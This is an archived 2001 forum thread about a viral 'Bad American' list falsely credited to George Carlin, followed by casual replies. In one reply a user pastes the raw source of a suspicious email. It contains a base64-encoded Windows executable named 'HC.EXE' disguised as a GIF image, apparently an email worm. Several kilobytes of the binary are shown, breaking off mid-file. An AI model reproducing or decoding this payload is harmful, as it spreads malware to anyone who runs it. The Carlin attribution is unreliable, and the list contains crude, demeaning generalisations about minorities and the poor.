1. Welcome to the 12ozProphet Forum...
    You are currently logged out and viewing our forum as a guest which only allows limited access to our discussions, photos and other forum features. If you are a 12ozProphet Member please login to get the full experience.

If you are not a 12ozProphet Member, please take a moment to register to gain full access to our website and all of its features. As a 12ozProphet Member you will be able to post comments, start discussions, communicate privately with other members and access members-only content. Registration is fast, simple and free, so join today and be a part of the largest and longest running Graffiti, Art, Style & Culture forum online.

Please note, if you are a 12ozProphet Member and are locked out of your account, you can recover your account using the 'lost password' link in the login form. If you no longer have access to the email you registered with, please email us at info@12ozprophet.com and we'll help you recover your account. Welcome to the 12ozProphet Forum (and don't forget to follow @12ozprophet in Instagram)!

George Carlin- Bad American

Discussion in 'Channel Zero' started by Dusty Lipschitz, Dec 6, 2001.

1. George Carlin- Bad American

Discussion started by Dusty Lipschitz - Dec 6, 2001

I Am Your Worst Nightmare. I am a BAD American.
    I am George Carlin.

I like big cars, big hooters, and big paychecks.

I believe the money I make belongs to me and my family, not some
    midlevel governmental functionary with a bad comb-over who wants to give it away to crack addicts squirting out babies.

I believe that if you are selling me a Big Mac, you'd better do it in
    English.

I'm not in touch with my feelings and I like it that way.

I believe that it doesn't take a village to raise a child, it takes
    two parents.

I think owning a gun doesn't make you a killer.

I want to know which church is it exactly where the Reverend Jesse
    Jackson preaches. And where does he get his money. And why is he always part of the problem and not the solution.

I believe if she has her lips on your willie, it is sex, and it is
    sex for both of you. This even applies when you are President of the United States.

I think that being a student doesn't give you any more enlightenment
    than working at Blockbuster. In fact, if your parents are footing the bill to put your pansy ass through 4-7 years of college, you haven't begun to be enlightened.

I believe everyone has a right to pray to his or her God or gods,
    just leave the rest of us out of it. This also applies to sexuality.

I believe it's called the Boy Scouts for a reason.

I don't think being a minority makes you noble or victimized.

I don't use the excuse "it's for the children" as a shield for
    unpopular opinions or actions.

I think fireworks should be legal on the 4th of July.

My heroes are John Wayne, the Simpsons, and whoever canceled Dr.
    Quinn, Medicine Woman.

I don't hate the rich. I don't pity the poor.

I know wrestling is fake and I don't waste my time arguing about it.

I think global warming is a big lie. Where are all those experts now,
    when I am freezing my ass through a long winter?

I've never owned a slave, or was a slave, I didn't wander forty years
    in the desert after getting chased out of Egypt, I haven't burned any witches or been persecuted by the Turks and neither have you, so shut up already.

I think the cops have every right to shoot your sorry ass if you're
    running from them. I also think they have the right to pull your ass over if you are breaking the law, regardless of what color you are.

I think if you are too stupid to know how a ballot works, I don't
    want you deciding who should be running the most powerful nation of the world for the next four years.

I think if you are in the passing lane, and not passing, your license
    should be revoked, and you should be forced to ride the bus until you promise to never delay the rest of us again.

I think beef jerky could quite possibly be the perfect food.

I think tattoos and piercing are fine if you want them, but please
    don't pretend they are a political statement.

I think Dr. Seuss was a genius.

I'm neither angry nor disenfranchised, no matter how desperately the
    mainstream media would like the world to believe otherwise.

If that makes me a BAD American, then yes, I'm a BAD American.
    If you too are a BAD American please forward this to everyone you
    know.

We need our country back!

2. beardo

beardo Guest

beardo - Replied Dec 6, 2001

A M E N

3. sectorTVA

sectorTVA 12oz Senior Member

sectorTVA - Replied Dec 6, 2001

mr carlin droped by on campus a month back...i didnt go see, but from what i hear, shit was funny....

sectorTVA - Rank: 12oz Senior Member - Messages:
  4. Obsessed

Obsessed Guest

Obsessed - Replied Dec 6, 2001

george carlin is great .

5. --zeSto--

--zeSto-- Guest

--zeSto-- - Replied Dec 6, 2001

his 7 words you cant say on television...

I found that record at the age of 7.

the fun times had begun!

shit,piss,fuck,cunt,cocksucker,motherfucker and tits

6. dukeofyork

dukeofyork Guest

dukeofyork - Replied Dec 6, 2001

i agree with all of it....

except that the cops should be able to shoot me for running.

7. Handjob

Handjob Guest

Handjob - Replied Dec 6, 2001

That was fucking beatiful...

Too bad I'm a Canadian. Good shit, tho...

8. alkaline

alkaline 12oz Elite Member

alkaline - Replied Dec 6, 2001

"I think Dr. Seuss was a genius. "
    Yes

"I think beef jerky could quite possibly be the perfect food. "
    Yes ... When I was a vegetarian, I would always crave the jerky.

alkaline - Rank: 12oz Elite Member - Messages:
  9. mental invalid

mental invalid Dirty Dozen Crew

mental invalid - Replied Dec 6, 2001

...HOLY SHIT!...dusty you just unwrapped a mystery...short and sweet...i got a mysterious email about three weeks ago, for the longest time i had no fucking idea what it was...i thought it was a virus...so email the guy and say what the fuck? he emails me back and says he never sent it...i emailed him again and said if i get something else theres gonna be a problem, but he still insists he has no idea what it was...i work for corporate america for now, head hung, and i thought it was aimed at my company....WEIRD...anyways for your interest heres the bizarre email.....i still dont know what the fuck it was all about...as far as carlin goes-genius....hysterical too...anyways thanks for atleast unwrapping the mystery somewhat....peace...rOe

children's charities and scholarship
    X-MSMail-Priority: Normal
    X-Priority: 3
    X-Mailer: Microsoft Outlook Express 5.00.2919.6600
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0026_014BE317.DAE31710"
    Content-Transfer-Encoding: 7bit

This is a multi-part message in MIME format.

------=_NextPart_000_0026_014BE317.DAE31710
    Content-Type: text/plain; charset=ISO-8859-1
    Content-Transfer-Encoding: 7bit

$13.7 million in the last
    5 years!!

I'm a Bad American - this pretty much
    sums it up for me.
    I like big trucks, big boats, big houses, and
    naturally, pretty women.

I believe the money I make belongs to me and my
    family, not some midlevel governmental functionary
    with a bad comb-over who wants to give it away to
    crack addicts squirting out babies. I don't care about
    appearing compassionate.

I think playing with toy guns doesn't make
    you a killer.
    ------=_NextPart_000_0026_014BE317.DAE31710
    Content-Type: image/gif; name="HC.EXE"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="HC.EXE"

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
